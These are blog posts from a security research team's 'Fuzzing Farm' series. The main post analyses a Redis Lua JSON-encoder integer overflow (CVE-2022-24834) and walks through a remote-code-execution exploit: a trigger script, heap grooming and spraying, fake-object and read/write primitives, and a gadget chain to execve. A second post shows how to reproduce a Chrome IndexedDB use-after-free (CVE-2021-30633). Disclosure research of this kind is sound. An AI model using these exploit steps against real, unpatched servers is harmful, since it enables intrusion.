Wednesday, July 19, 2023


Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]

Authors: Dronex, ptr-yudai

Introduction

 This article is part 4 of the Fuzzing Farm series. You can check the previous article at "Fuzzing Farm #3: Patch Analysis and PoC Development."

 The Fuzzing Farm team is not only working on 1-day exploits, but also developing 0-day exploits. In the final chapter of the Fuzzing Farm series, we will explain the 0-day vulnerability discovered by our engineers and the process for developing the exploit.

 Over a year ago, in April 2022, we discovered a vulnerability in Redis related to the Lua interpreter and developed an RCE (Remote Code Execution) exploit for it. Although the vendor moved quickly on a fix, it took time for users to update, which is why there has been a gap between the Part 3 article and this post. Now that the fix is out and the vendor has disclosed the details, we decided to publish this article.

CVE-2022-24834

 CVE-2022-24834 is a vulnerability in the Lua interpreter of Redis, discovered and reported by Dronex and ptr-yudai of the Fuzzing Farm team. Redis is an open-source data store used worldwide as a database, cache, and more.

 We reported this vulnerability in April 2022, and the fix was released on July 10, 2023.

 

Background to Vulnerability Discovery

 The Fuzzing Farm team selected Redis as its target from among many open-source software candidates, considering factors such as the number of users, the size of the codebase, and the potential impact.

 Since Redis has many features, it is more efficient to narrow down the target before hunting for vulnerabilities. Redis is not just a simple data store: it also embeds a Lua interpreter so that clients can run complex processing server-side. Several vulnerabilities have been reported in this component in the past, such as CVE-2015-8080 and CVE-2018-11218. Therefore, we focused our investigation on the Lua feature of Redis.

 Although we found multiple vulnerabilities and issues in Redis other than Lua, we decided to explain CVE-2022-24834 in this blog post because it is exploitable and technically interesting.

Root Cause Analysis

  CVE-2022-24834 is caused by an issue with the JSON encoder in the Lua interpreter in Redis. Specifically, the issue is related to the json_append_string function.

/* json_append_string args:
 * - lua_State
 * - JSON strbuf
 * - String (Lua stack index)
 *
 * Returns nothing. Doesn't remove string from Lua stack */
static void json_append_string(lua_State *l, strbuf_t *json, int lindex)
{
    const char *escstr;
    int i;
    const char *str;
    size_t len;

    str = lua_tolstring(l, lindex, &len);

    /* Worst case is len * 6 (all unicode escapes).
     * This buffer is reused constantly for small strings
     * If there are any excess pages, they won't be hit anyway.
     * This gains ~5% speedup. */
    strbuf_ensure_empty_length(json, len * 6 + 2);    // [1]

    strbuf_append_char_unsafe(json, '\"');
    for (i = 0; i < len; i++) {
        escstr = char2escape[(unsigned char)str[i]];
        if (escstr)
            strbuf_append_string(json, escstr);
        else
            strbuf_append_char_unsafe(json, str[i]);
    }
    strbuf_append_char_unsafe(json, '\"');
}

 This function encodes Lua string objects into JSON string literals. For example, the string Hello, 世界 is encoded as "Hello, \u4e16\u754c".

 The buffer for the encoded string is allocated on line [1]. As shown in the previous example, a single character can be represented by a maximum of a 6-byte Unicode escape sequence. Therefore, the buffer is allocated with the size len * 6 + 2. Care must be taken to avoid integer overflow during this size calculation. In this case, the variable len is of type size_t, which is defined as a 64-bit integer. To cause an overflow, we would need to encode a string that is (2^64 - 2) / 6 bytes in size, which is not practical.

 The definition of strbuf_ensure_empty_length, however, is as follows:

static inline void strbuf_ensure_empty_length(strbuf_t *s, int len)
{
    if (len > strbuf_empty_length(s))    // [2]
        strbuf_resize(s, s->length + len);
}

 The length argument is defined as an int type, so an integer overflow can occur when len * 6 + 2 is cast to int. For example:

  • 0x20000000 * 6 + 2 = 0xc0000002 → -1073741822 (negative as a 32-bit int)
  • 0x30000000 * 6 + 2 = 0x120000002 → 0x20000002 = 536870914 (upper bits truncated)

 If integer overflow occurs, the buffer cannot be allocated with the intended size. Moreover, if the result of the integer overflow is a negative value, the expression on line [2] always evaluates to false, and the buffer is not resized. Additionally, strbuf_append_char_unsafe adds characters to the buffer without checking the buffer size. As a result, a heap buffer overflow occurs.
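 As a quick sanity check, the truncation itself can be reproduced in plain Lua with the LuaBitOp bit library (which Redis also bundles for scripts). This is only an illustration of the arithmetic, not part of the exploit:

-- Illustrative only: bit.tobit() reinterprets a number as a signed 32-bit int,
-- mimicking the implicit cast of len * 6 + 2 to the int parameter.
local bit = require("bit")        -- already available as a global inside Redis scripts
local len = 0x20000000            -- a 512 MiB input string
print(bit.tobit(len * 6 + 2))     --> -1073741822 (negative, so no resize happens)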

 To trigger the buffer overflow, a string of length (0x80000000 - 2) / 6 = 0x15555555 bytes is required. This is approximately 341 MiB and is a practical size for 64-bit systems.
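 Putting this together, a minimal trigger looks roughly like the following Lua script, run via EVAL against a disposable Redis instance. This is a sketch based on the analysis above; the length is the 0x15555555 value derived earlier:

-- Hypothetical crash trigger for CVE-2022-24834 (test instances only).
-- cjson is the JSON library exposed to Redis Lua scripts.
local len = 0x15555555                -- (0x80000000 - 2) / 6, about 341 MiB
local payload = string.rep("A", len)  -- plain ASCII, copied byte-for-byte
return cjson.encode(payload)          -- len * 6 + 2 wraps negative -> heap overflow

 In practice the script also needs the heap grooming described below; otherwise the huge write simply runs off the end of the mapped heap and crashes.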

Writing an RCE Exploit

Challenges in Exploit

 Although it is possible to cause a heap buffer overflow, there are several constraints that make the situation challenging in this case.

[Challenge 1] A huge amount of data must be written

 Because the overflow writes 0x15555557 bytes into a buffer that was never resized, it tramples a large part of the heap. We therefore have to make sure the data Redis needs to keep running is not destroyed. Moreover, since the overflow is far larger than a typical heap, the write eventually reaches an unmapped region and crashes the process.

[Challenge 2] ASLR and PIE are enabled

 Redis is compiled with PIE, like most modern applications, and of course, ASLR is enabled on the system. We need to somehow leak the address.

[Challenge 3] Data is Unicode-escaped

 The data that overflows is encoded as a JSON string literal, so many characters, including NULL bytes, are Unicode-escaped. Therefore, we cannot simply write an arbitrary byte sequence with the overflow.

[Challenge 4] A double quote is added

 The written byte sequence always ends with a " (closing quotation mark of the string literal). We need to take it into account.

 To resolve Challenge 1, we can allocate a large amount of data in advance to expand the heap and avoid a crash. As Lua uses GC (Garbage Collector), releasing somewhat large string data will free up space when the GC runs. Even if the data is released, its memory remains mapped, so overflowing a heap buffer with a large amount of data will not cause a crash.
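 For example, the heap can be extended ahead of time with something like the following sketch (the size is arbitrary as long as it comfortably exceeds the overflow length):

-- Hypothetical heap-grooming sketch: grow the heap so the pages stay mapped,
-- then drop the reference and force a GC cycle. The freed-but-still-mapped
-- region is what the later 0x15555557-byte overflow will scribble over.
local pad = string.rep("A", 0x18000000)   -- ~384 MiB, larger than the overflow
pad = nil
collectgarbage("collect")                 -- memory is freed but stays mapped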

 It is also important to manipulate the heap appropriately in advance to prevent the destruction of important structures.

 While Challenge 2 can be easily solved, we will describe this later.

 The most critical issues related to exploitability are Challenges 3 and 4. Although a heap overflow may be possible, there are significant constraints on the data that can overflow. Writing a stable exploit under these constraints can be quite challenging.

Variables in Lua

 Let's investigate how Lua manages variables in memory.

 Lua uses the mark-and-sweep garbage collector for memory management. You can force garbage collection using the built-in collectgarbage function, so you don't need to worry about it too much.

 Also, every Lua object is managed by a tagged structure called TValue.

typedef union {
  GCObject *gc;
  void *p;
  lua_Number n;
  int b;
} Value;

#define TValuefields	Value value; int tt

typedef struct lua_TValue {
  TValuefields;
} TValue;

 The member variable tt represents the type, which can take one of the following values.

#define LUA_TNONE		(-1)

#define LUA_TNIL		0
#define LUA_TBOOLEAN		1
#define LUA_TLIGHTUSERDATA	2
#define LUA_TNUMBER		3
#define LUA_TSTRING		4
#define LUA_TTABLE		5
#define LUA_TFUNCTION		6
#define LUA_TUSERDATA		7
#define LUA_TTHREAD		8

Here are some important types:

  • LUA_TNUMBER
    • Indicates the numeric type. It is internally represented as a simple double type.
  • LUA_TSTRING
    • Indicates the string type. The string body is located immediately after the header in memory. Lua strings are immutable and cannot be modified.
    • The hash value for the allocated string is calculated and managed by Lua. This prevents the same string from being allocated multiple times for efficiency.
typedef union TString {
  L_Umaxalign dummy;  /* ensures maximum alignment for strings */
  struct {
    CommonHeader;
    lu_byte reserved;
    unsigned int hash;
    size_t len;
  } tsv;
} TString;

  • LUA_TTABLE
    • Indicates the table type. A table is an object that can have either an array or an associative array.
    • When used as an array, a pointer to the TValue array (array) and its size (sizearray) are used.
typedef struct Table {
  CommonHeader;
  lu_byte flags;  /* 1<<p means tagmethod(p) is not present */
  int readonly;
  lu_byte lsizenode;  /* log2 of size of `node' array */
  struct Table *metatable;
  TValue *array;  /* array part */
  Node *node;
  Node *lastfree;  /* any free position is before this position */
  GCObject *gclist;
  int sizearray;  /* size of `array' array */
} Table;

  • LUA_TFUNCTION
    • Indicates the closure type. It is used for a closure to a function defined in Lua (LClosure), or a closure to a C-defined built-in function (CClosure).
typedef struct CClosure {
  ClosureHeader;
  lua_CFunction f;
  TValue upvalue[1];
} CClosure;

typedef struct LClosure {
  ClosureHeader;
  struct Proto *p;
  UpVal *upvals[1];
} LClosure;

typedef union Closure {
  CClosure c;
  LClosure l;
} Closure;

Creating the Addrof Primitive

 We need to solve Challenge 2 despite ASLR and PIE being enabled. However, this problem can be easily resolved. According to the Lua specification, when a Lua table or built-in function is stringified with tostring, the address of the object allocated on the heap is returned as a string. This means that the addrof primitive that obtains the object's address is available without the vulnerability.
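 In Lua this can be wrapped into a tiny helper. The sketch below assumes the default tostring() format of the Lua 5.1 interpreter embedded in Redis, which is "type: 0x...":

-- addrof for tables and functions, no bug required: parse the heap address out
-- of the default tostring() representation, e.g. "table: 0x7f1c2a40e3c0".
local function addrof(obj)
  return tonumber(string.match(tostring(obj), "0x%x+"))
end

local t = {}
local addr = addrof(t)   -- heap address of the Table object backing t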

 

 The ASLR problem can be solved if we have the heap address.

Creating a Fake Object

 It's not possible to write a valid address in the heap buffer overflow because there are limitations on the characters that can be written. In such cases, there are mainly two exploitation techniques:

  1. Metadata Corruption

    Even if there are limitations on the data, rewriting metadata such as size information might work. Let's check if it's possible under the current condition.

    First, it's not possible to write characters to a string variable even if the size information is corrupted since the string is immutable in Lua. Also, the size information is located after the pointer to the array. It's not possible to rewrite only the size information without destroying the pointer. Therefore, it seems difficult to rewrite metadata in this condition.

  2. Partial Overwrite

    We can redirect a pointer to a fake address by partially overwriting it. For example, rewriting the least significant byte of a table's array pointer so that it points to a fake array looks promising. This is the approach we took for this exploit.

 As mentioned in Challenge 4, the data that overflows always ends with " (0x22). By overwriting the least significant byte of the pointer to the array with this value, an incorrect memory address is recognized as a pointer to the array.

 A normal table (array) has a structure as shown in Figure 1. There is a table object, and its array points to the array entity of TValue type. If the TValue is a type with a pointer, such as a table or string, there is also a pointer to the object entity.

 

Figure 1. Typical table object in Lua

 

 We will overwrite the least significant byte of the pointer array with ", which has a hexadecimal value of 0x22. Next, we prepare a fake array, crafted inside a string, at an address slightly lower than the legitimate array. As shown in Figure 2, the pointer array then points to the fake array, allowing us to obtain an arbitrary fake object. Fortunately, even if the pointer metatable ends up holding a garbage value, the program will not crash as long as we never touch the table's metatable.

 

Figure 2. Table object with the least significant byte of the array pointer corrupted
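 The fake array contents themselves can be laid out inside an ordinary Lua string, for instance with the struct library that Redis bundles. In the sketch below, the tag value LUA_TTABLE (5) and the 16-byte TValue layout follow the structures shown earlier; everything else (the address value, the repetition count) is illustrative:

-- Hypothetical sketch of a fake TValue array packed into a Lua string (struct
-- ships with Redis's Lua environment). Each TValue is 16 bytes: an 8-byte Value
-- (here a GCObject pointer) followed by the 4-byte tt tag padded to 8 bytes.
local fake_object_addr = 0x7f1c2a40e3c0                        -- illustrative value
local fake_tvalue = struct.pack("<I8I8", fake_object_addr, 5)  -- value, tt = LUA_TTABLE
local fake_array = string.rep(fake_tvalue, 0x100)              -- fill nearby slots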

 

 The issue is that you must allocate a table object at the precise position where the last byte (0x22) overwrites the least significant byte of the pointer array. One way to stabilize it is through heap spraying to consume freed chunks.

 With the addrof primitive, we can determine the exact address of the fake object, which enables us to create a fakeobj while avoiding Challenges 3 and 4. Unfortunately, this fakeobj is still not a useful primitive because it can only be used once.
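 Landing a Table header at the right spot can be helped along with a spray, roughly like this (the object count and shape are illustrative; the point is simply to have many candidate Table objects reuse freed chunks near where the overflow ends):

-- Hypothetical heap-spray sketch: keep many small tables alive so that one of
-- them ends up with its 'array' pointer exactly where the trailing 0x22 byte
-- of the JSON overflow lands.
local spray = {}
for i = 1, 0x2000 do
  spray[i] = { 1.1, 2.2, 3.3, 4.4 }   -- each table has a small array part
end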

Creating AAR/AAW Primitive

 Let's create more powerful primitives such as arbitrary address read (AAR) and arbitrary address write (AAW).

 It is possible to create a fake table structure as we can obtain a fake object. The base address of this fake array should be set to as low an address as possible, and the size should be made as large as possible. As a result, this fake array becomes a table that can reference a wide area of the heap.

 

Figure 3. Creating a fake table object
 

 If we set the type of the array to number, we can write relatively arbitrary values to the specified address. However, due to the nature of TValue, simple read and write operations are not possible. TValue is a 16-byte structure that holds the value entity (or pointer) and type information. In the case of number type, the following restrictions apply:

  • Write: A double type value is written to value. Additionally, the type information is overwritten with LUA_TNUMBER.
  • Read: A double type value is read from value. However, an assertion error will occur if the type information is not LUA_TNUMBER.

 Note that when writing, LUA_TNUMBER is also written 8 bytes after the target address, as shown in Figure 4.

 

Figure 4. Write to arbitrary address

 

 For reads, the type tag must already be valid: LUA_TNUMBER has to be written 8 bytes after the address to be read beforehand. (Consequently, this method cannot read from read-only memory.) See Figure 5 for an illustration.

 

Figure 5. Read from arbitrary address

 Since TValue is 0x10 bytes in size, you can only write to addresses that are multiples of 0x10 from the base address pointed to by the array of the fake table. Therefore, as shown in Figure 6, we created another fake table whose base address is 8 bytes lower. The address and size of the table shown on the right can be overwritten with a relative write from the fake table on the left, because the offsets of the array and sizearray members within the Table structure are, fortunately, multiples of 0x10.


Figure 6. AAR/AAW primitive


 This allows us to create relative AAR/AAW primitives that can freely read and write data on the heap, with the constraint that LUA_TNUMBER tags get written in the process.
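 In terms of Lua code, once the corrupted table described above exists, the primitives are plain array indexing. In the sketch below, fake_table, the index, and the written value are placeholders for what the real PoC computes from leaked addresses:

-- Relative AAW: writing index i stores a double at array + 0x10*(i-1) and the
-- tag LUA_TNUMBER (3) at array + 0x10*(i-1) + 8.
fake_table[0x100] = some_double_encoded_value
-- Relative AAR: reading the same index loads the double back, provided the tag
-- at +8 already holds LUA_TNUMBER.
local leaked = fake_table[0x100]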

Creating Addrof/Fakeobj primitive

 The addrof primitive we have at this point only works with certain objects, such as tables and functions, since it relies on tostring. Additionally, fakeobj could only be used once at the beginning, limiting its utility.

 However, with the AAR/AAW primitives, we can now create addrof and fakeobj primitives. With full control over the heap, it is easy to create fake objects of any type. As shown in Figure 7, we can first overwrite the address and type information of an array element, and then create fake objects with the desired type.

 

Figure 7. Creating fakeobj primitive
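 Expressed as code, the idea is roughly the following. write_value and write_tag stand in for the AAR/AAW helpers above and are hypothetical names, as are holder_slot and target_addr; LUA_TTABLE is 5:

-- Hypothetical fakeobj sketch: make holder[1]'s TValue point at an
-- attacker-chosen address with an attacker-chosen type tag, then read it back.
local holder = { 0.0 }                  -- a TValue slot reachable with the AAW
write_value(holder_slot, target_addr)   -- TValue.value.gc = target_addr
write_tag(holder_slot + 8, 5)           -- TValue.tt = LUA_TTABLE
local fake = holder[1]                  -- now a reference of the forged type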
 

 Similarly, as shown in Figure 8, we can store the object we want to leak in an array and overwrite its type information with LUA_TNUMBER. The element is then treated as a number the next time the array is read, allowing us to obtain the address of the object.

 

Figure 8. Creating addrof primitive
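 The generalized addrof is the mirror image (again a sketch with the same hypothetical helper names; LUA_TNUMBER is 3 and double_to_u64 is an illustrative conversion routine):

-- Hypothetical addrof sketch: store the object so its pointer sits in a TValue
-- we can reach, flip the tag to LUA_TNUMBER, and read the pointer back as a double.
local holder = { some_object }
write_tag(holder_slot + 8, 3)             -- TValue.tt = LUA_TNUMBER
local addr = double_to_u64(holder[1])     -- pointer bits, reinterpreted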

Final Step: RCE

 With these primitives, controlling RIP (the instruction pointer) is simple. A CClosure-type function wraps a function written in C, meaning it holds a function pointer. By creating a fake built-in function with fakeobj and calling it, we can make the program jump to any address we want.

 However, we cannot control the arguments. Redis uses execve somewhere, and it has the PLT (Procedure Linkage Table) for the function. We can use the PLT to call execve. However, to execute arbitrary commands, we need to pass three arguments to execve appropriately. In this situation, controlling the arguments with Call Oriented Programming is useful.

 When building a call chain, the first step is to identify where the function pointer comes from. Let's look at the assembly of luaD_precall, which calls the function pointer. As shown below, the function pointer is located at rax+0x20.

 

 

 In essence, RAX currently refers to a controllable fake function object. As a result, we can create a call chain using certain gadgets that ends with instructions such as call qword ptr [rax+XXX]. (The function pointer itself is located at offset 0x20; therefore, we use other locations to build the chain.)

 In the call chain, we only need to perform the following three operations:

  • Set RDX (envp) to 0.
  • Set RSI (argv) to argv.
  • Set RDI (pathname) to argv[0].

 One gadget that might prove useful for setting RDX to 0 is the following:

0x000abb6a:
xor edx, edx;
xor esi, esi;
mov rdi, rbp;
call qword ptr [rax+0x38];

 Next, we need to assign specific addresses to RDI and RSI registers. As the data pointed to by RAX is controllable, we should search for a "mov" gadget. For instance, you may find the following one:

0x001554c8:
mov rdi, [rax];
call qword ptr [rax+0x18];

 A gadget that loads a value into RSI can also be found, as shown below. However, its load uses the same source memory as the RDI load in the previous gadget, it clobbers RDX, and the memory read by its call instruction overlaps with that of the first gadget, rendering it unusable as-is.

0x000d1f3e:
mov rsi, [rax];            // conflict!
mov rdx, rbp;              // overwrite!
call qword ptr [rax+0x38]; // conflict!

 We used the following gadget instead.

0x0012718b:
mov rsi, [rdi+8];
mov rdi, [rdi];
call qword ptr [rax+0x10];

 This gadget can set values for both RDI and RSI. The source memory for the values is RDI, but this is not a problem as RDI is controllable with the second gadget. The entire chain can be seen in Figure 9.
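 For reference, the fake CClosure body that drives this chain can be summarized as an offset table. The following is illustrative pseudo-Lua, not code from the actual PoC: base stands for the leaked Redis image base, execve_plt for its execve PLT entry, and args_ptr for a small buffer holding the pathname and argv pointers.

-- Offsets are relative to RAX when luaD_precall dispatches the fake closure.
fake_cclosure = {
  [0x00] = args_ptr,           -- [args+0x0] = &"/bin/sh", [args+0x8] = &argv
  [0x10] = execve_plt,         -- final target: execve(pathname, argv, NULL)
  [0x18] = base + 0x0012718b,  -- gadget 3: rsi=[rdi+8]; rdi=[rdi]; call [rax+0x10]
  [0x20] = base + 0x000abb6a,  -- gadget 1 (the "function pointer"): rdx=0; call [rax+0x38]
  [0x38] = base + 0x001554c8,  -- gadget 2: rdi=[rax]; call [rax+0x18]
}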

 

Figure 9. Call chain
 

  The address of the gadget depends on the version of Redis. However, the gadget used in this call chain is a generic gadget that can be found in both the version at the time we discovered the vulnerability and the version at the time we published this article.

Exploit

 You can find the final exploit in the following GitHub repository. We tested it against the commit right before the patch was applied.

CVE-2022-24834 - RICSecLab/exploit-poc-public

 The following is the PoC video for this vulnerability.

 


Tuesday, July 18, 2023

Fuzzing Farm #3: Patch Analysis and PoC Development

Author: Dronex

Introduction

 This article is part 3 of the Fuzzing Farm series, which consists of 4 chapters. You can check the previous post at "Fuzzing Farm #2: Evaluating the Performance of Fuzzer."

 The Fuzzing Farm team concentrates on exploiting OSS products, including 1-day and 0-day analysis. The remaining two parts of the Fuzzing Farm series will cover our activities related to 1-day/0-day exploit development.

 Proof-of-Concepts (PoCs) are a powerful tool for attackers. By reading and running a PoC, attackers can easily investigate the exploitability of a bug. PoCs are also useful for achieving more powerful exploits, such as Remote Code Execution (RCE) and Local Privilege Escalation (LPE).

 However, bug reports may not always include PoCs. Additionally, most bug reports regarding a product's security are kept private. For example, CVE-2021-30633 is a CVE assigned to a bug in Google Chrome on April 13, 2021. The Fuzzing Farm team investigated this bug in November 2021, but as of July 2023, the bug report is still private.

 If there is no access to a proof of concept (PoC), attackers must create their own. One of the responsibilities of the Fuzzing Farm team is to explore the exploitability of security bugs that are not publicly disclosed.

 This blog post explains the process of finding a patch corresponding to a specific CVE, analyzing it, and writing a PoC. We'll use CVE-2021-30633 as an example, a use-after-free vulnerability in Google Chrome, since sufficient time has passed since its fix.

CVE-2021-30633

 According to Google's official announcement regarding this CVE, the bug is described as follows:

High CVE-2021-30633: Use after free in Indexed DB API. Reported by Anonymous on 2021-09-08

 Reportedly, the vulnerability had already been fixed before Chromium 93.0.4577.82, but the bug report is still private.

 Before analyzing the patch, let's get an overview of the bug. What is "Indexed DB" in the announcement?

 IndexedDB is a client-side (in-browser) storage mechanism supported by modern browsers, not just Chrome. This feature allows us to create, edit, and delete data in IndexedDB through the IndexedDB API. It is similar to the Web Storage API, but unlike Web Storage, IndexedDB can store not only string values but also structured data.

 IndexedDB has the following characteristics:

  • IndexedDB has a larger capacity compared to Web Storage. It can store more than a GiB if the client's storage has enough space.
  • IndexedDB can store not only strings but also JavaScript objects.
  • Most of the operations in IndexedDB are asynchronous. Notifications of the completion or error of an operation are passed through event handlers or Promises.
  • Transactions are used to access data in IndexedDB. Transactional operations are either finished by Commit or destroyed/rolled back by Abort.

 Since the Renderer process of the browser does not have the privilege to access local storage, all of the actual IndexedDB operations are handled in the Browser process.

Analysing Patch and Bug

 To locate the vulnerable code corresponding to CVE-2021-30633, we searched the Chromium code base and studied some commits related to IndexedDB prior to Chromium 93.0.4577.82. We found the following 2 commits as a result:

 The first commit is a patch related to transactions in IndexedDB. The following code shows a portion of this patch:

@@ -87,6 +87,13 @@
     return;
   }
 
+  if (!transaction->IsAcceptingRequests()) {
+    mojo::ReportBadMessage(
+        "RenameObjectStore was called after committing or aborting the "
+        "transaction");
+    return;
+  }
+
   transaction->ScheduleTask(
       blink::mojom::IDBTaskType::Preemptive,
       BindWeakOperation(&IndexedDBDatabase::RenameObjectStoreOperation,

 This commit adds several branches to abort some operations after Commit. The second commit is a patch that ensures the integrity of the first patch and is not related to the bug itself.

@@ -295,8 +295,8 @@
     return;
 
   if (!transaction_->IsAcceptingRequests()) {
-    mojo::ReportBadMessage(
-        "Commit was called after committing or aborting the transaction");
+    // This really shouldn't be happening, but seems to be happening anyway. So
+    // rather than killing the renderer, simply ignore the request.
     return;
   }

 Figure 1 illustrates the flow of a typical transaction in IndexedDB.

  1. Create a transaction.
  2. Send a request, such as Get, Put, or Delete.
  3. Send a Commit request to actually execute the sequence of operations. (This is often run automatically, but the programmer can explicitly send a Commit request.)
  4. End the transaction.

 

Figure 1. The flow of a typical transaction in IndexedDB

 If we try to send a request after Commit from the JavaScript API, an exception is thrown. However, if we make the request directly over Mojo 1, rather than through the JavaScript API, nothing prevents us from sending as many requests to the Browser process as we want, even though they should not be accepted.

 Here, let's take a look again at the code added by the patch in question.

  if (!transaction->IsAcceptingRequests()) {
    mojo::ReportBadMessage(
        "RenameObjectStore was called after committing or aborting the "
        "transaction");
    return;
  }

 Based on the method name, we can infer that this code aborts a transaction if the transaction no longer accepts any requests. Therefore, we can assume that the vulnerability occurs when an operation is requested after the transaction has been committed, which is when the transaction stops accepting requests.

Operation on Browser Process

 Database operations are not executed immediately upon request arrival; instead, they are first pushed to the task queue. The task queue is also used to wait for database requests until a Commit is requested.

 Figure 2 illustrates the flow of the Commit request. During the interval of each step, the Renderer process can send other requests.

  1. A Commit request arrives, and the is_commit_pending_ flag of the transaction is set.
  2. The commit operation begins. Some transactions execute CommitPhaseOne first, while others skip it and execute CommitPhaseTwo.
  3. CommitPhaseTwo is executed. The transaction's state is set to dead, and it is no longer processed.

 

Figure 2. Operations after a Commit request arrives

  Any request made after step 1 will be discarded if we apply the patch. The crash we discovered (explained later on) occurs between step 2 and 3, leading us to conclude that this is the bug corresponding to CVE-2021-30633.

Use-after-Free: CommitPhaseOne

 We will investigate the cause of the Use-after-Free vulnerability that is believed to correspond to CVE-2021-30633.

 IndexedDBBackingStore::Transaction::CommitPhaseOne is called when a Commit request arrives, and it handles the first phase of the Commit process. If external_object_change_map_ is not empty, this method writes data. external_object_change_map_ is a variable that holds external objects modified by the transaction. External objects are used to store file handles when an external file is used. This occurs when the File System Access API is called or when the data is too large to use a Blob.

 The writing process is implemented in IndexedDBBackingStore::Transaction::WriteNewBlobs with the following code (in content/browser/indexed_db/indexed_db_backing_store.cc).

for (auto& iter : external_object_change_map_) {
    for (auto& entry : iter.second->mutable_external_objects()) {
      switch (entry.object_type()) {
        case IndexedDBExternalObject::ObjectType::kFile:
        case IndexedDBExternalObject::ObjectType::kBlob:
        /* ... snipped ... */
        case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle: {
          if (!entry.file_system_access_token().empty())
            continue;
          // TODO(dmurph): Refactor IndexedDBExternalObject to not use a
          // SharedRemote, so this code can just move the remote, instead of
          // cloning.
          mojo::PendingRemote<blink::mojom::FileSystemAccessTransferToken>
              token_clone;
          entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());

          backing_store_->file_system_access_context_->SerializeHandle(
              std::move(token_clone),
              base::BindOnce(
                  [](base::WeakPtr<Transaction> transaction,
                     IndexedDBExternalObject* object,
                     base::OnceCallback<void(
                         storage::mojom::WriteBlobToFileResult)> callback,
                     const std::vector<uint8_t>& serialized_token) {
                    // |object| is owned by |transaction|, so make sure
                    // |transaction| is still valid before doing anything else.
                    if (!transaction)
                      return;
                    if (serialized_token.empty()) {
                      std::move(callback).Run(
                          storage::mojom::WriteBlobToFileResult::kError);
                      return;
                    }
                    object->set_file_system_access_token(serialized_token);
                    std::move(callback).Run(
                        storage::mojom::WriteBlobToFileResult::kSuccess);
                  },
                  weak_ptr_factory_.GetWeakPtr(), &entry,
                  write_result_callback));
          break;
        }
      }
    }
  }

 Let's focus on the case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle in the switch statement. This block is executed when a value with a file handle is requested with Put.

 Here, a callback function is given as an argument to the backing_store_->file_system_access_context_->SerializeHandle call, and the raw pointer &entry is bound as an argument to the callback function.

 entry is an element of the vector returned by mutable_external_objects(), which is called on an element of external_object_change_map_. The summary of the variables is as follows:

  • external_object_change_map_
    • A map that holds the IndexedDBExternalObjectChangeRecord instances modified by the transaction.
  • entry
    • A reference to a variable of type IndexedDBExternalObject.
  • mutable_external_objects():
    • Returns a reference to the member variable external_objects_.
    • The type of external_objects_ is std::vector<IndexedDBExternalObject>.

 If the memory region referenced by external_objects_ is freed or reallocated after the callback is set, the pointer &entry becomes invalid. This can lead to Use-after-Free issues in the following code. (Note that the variable object refers to the pointer entry.)

object->set_file_system_access_token(serialized_token);

 If this line of code is executed for an invalid entry, the program will try to write to invalid memory, potentially causing a Use-after-Free vulnerability.

Race Condition to Use-after-Free

 To cause the Use-after-Free, we need to free the memory pointed to by external_objects_. Let's find code that accomplishes this.

 The IndexedDBBackingStore::Transaction::PutExternalObjects method is called when an IndexedDBValue with a non-empty external_objects_ is passed in a Put request.

const auto& it = external_object_change_map_.find(object_store_data_key);
  IndexedDBExternalObjectChangeRecord* record = nullptr;
  if (it == external_object_change_map_.end()) {
    std::unique_ptr<IndexedDBExternalObjectChangeRecord> new_record =
        std::make_unique<IndexedDBExternalObjectChangeRecord>(
            object_store_data_key);
    record = new_record.get();
    external_object_change_map_[object_store_data_key] = std::move(new_record);
  } else {
    record = it->second.get(); // [1]
  }
  record->SetExternalObjects(external_objects); // [2]

 If the key of the Put request already exists in the database, it will go through the else clause [1], retrieve the existing record record, and then reach [2]. The SetExternalObjects method simply replaces the contents of external_objects_, that is, it replaces the existing data for the key with the new data.

void IndexedDBExternalObjectChangeRecord::SetExternalObjects(
    std::vector<IndexedDBExternalObject>* external_objects) {
  external_objects_.clear();
  if (external_objects)
    external_objects_.swap(*external_objects);
}

 The clear method call invokes the destructor for each element of IndexedDBExternalObject. Additionally, the subsequent swap method swaps the pointers of member variable external_objects_ and argument external_objects. As a result, the old pointer is released when external_objects is destroyed. If the callback in question is called at this timing, it can lead to Use-after-Free.

PoC: Bug Reproduction

 To reproduce the crash, we need to make it possible to use Mojo from JavaScript to directly request operations from the Renderer to the Browser. Mojo is available from JavaScript when a feature called MojoJS is enabled, but this feature is disabled by default. Attackers usually enable this feature by exploiting vulnerabilities in the Renderer process. However, since this is an experiment for writing a PoC, we can simply enable it by passing --enable-blink-features=MojoJS,MojoJSTest to Chrome on the command line.

 We can cause the Use-after-Free vulnerability in the following steps:

  1. Send a Put request with an IDBValue that has a file handle.
  2. Send a Commit request. (This request can be sent before step 1 as it may cause a delay.)
  3. Send another Put request with an IDBValue that has the same key but a different external_objects set after WriteNewBlobs is called and before the callback is invoked.

 

Figure 3. The flow of race condition


 We repeat these steps until the race condition triggers a Use-after-Free vulnerability.

 To easily confirm the vulnerability, we can execute the PoC on Chromium compiled with AddressSanitizer. The resulting crash is shown in Figure 4.

Figure 4. Use-after-Free triggering a crash


 Based on this crash message, we can confirm that there is a Use-after-Free occurring in the code we have investigated. The PoC code is available in the gist link below.

https://github.com/RICSecLab/exploit-poc-public/tree/main/CVE-2021-30633

Conclusion

 This article explains the process from when an attacker investigates a CVE to writing a PoC. Once the PoC is written, the next step is to examine its exploitability. In this case, the vulnerability is useful for sandbox escape in Chrome when combined with exploiting the Renderer process and enabling Mojo in advance.

 Writing a PoC based on limited vulnerability information can be helpful in determining the exploitability and how we can achieve code execution.

 In the next article, we will cover the 0-day which the Fuzzing Farm team discovered and exploited.

 

1: A low-layer API used for communication between Renderer and Browser processes.

Friday, July 14, 2023

Fuzzing Farm #2: Evaluating Performance of Fuzzer

 Author: hugeh0ge

Introduction

 This article is Part 2 of the 4 blog posts in the Fuzzing Farm series. You can find the previous post at "Fuzzing Farm #1: Fuzzing GEGL with fuzzuf."

 As mentioned in Part 1, our Fuzzing Farm team uses our fuzzing framework, fuzzuf, to find software bugs. It's not just the Fuzzing Farm team that works with fuzzers in our company; many situations arise where we need to evaluate the performance of different fuzzers, both in the development of fuzzuf itself and in other research.

 However, there is little organized documentation about evaluating fuzzers, and numerous pitfalls exist in benchmarking. Without careful evaluation, one may draw incorrect conclusions. Does greater code coverage mean better performance? Is a fuzzer that finds more crashes superior?

